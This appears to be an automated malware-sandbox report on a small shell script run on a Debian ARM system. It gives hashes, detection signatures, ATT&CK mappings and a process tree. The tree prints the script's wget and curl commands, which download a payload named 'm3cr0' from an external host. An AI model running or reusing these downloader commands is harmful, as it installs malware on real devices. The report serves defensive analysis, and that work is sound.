0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

Analysis

max time kernel
149s
max time network
3s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
23-10-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Size

3KB
MD5

cf70ee36f1e9247f2146e4981924d4f4
SHA1

7eabae4200118c4e89979658db6e4d905fe3dae9
SHA256

0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
SHA512

60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Score

4^/10

antivm discovery

Malware Config

Signatures

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curl

description ioc process

File opened for reading /proc/cpuinfo curl
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
discovery

Processes:

curl

description ioc process

File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/self/auxv curl
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

wget

description ioc process

File opened for modification /tmp/m3cr0 wget

description	ioc	process
File opened for reading	/proc/cpuinfo	curl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

description	ioc	process
File opened for modification	/tmp/m3cr0	wget

/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
1⤵
PID:660
- /usr/bin/wget
  wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
  2⤵
  - Writes file to tmp directory
  PID:662
- /usr/bin/curl
  curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads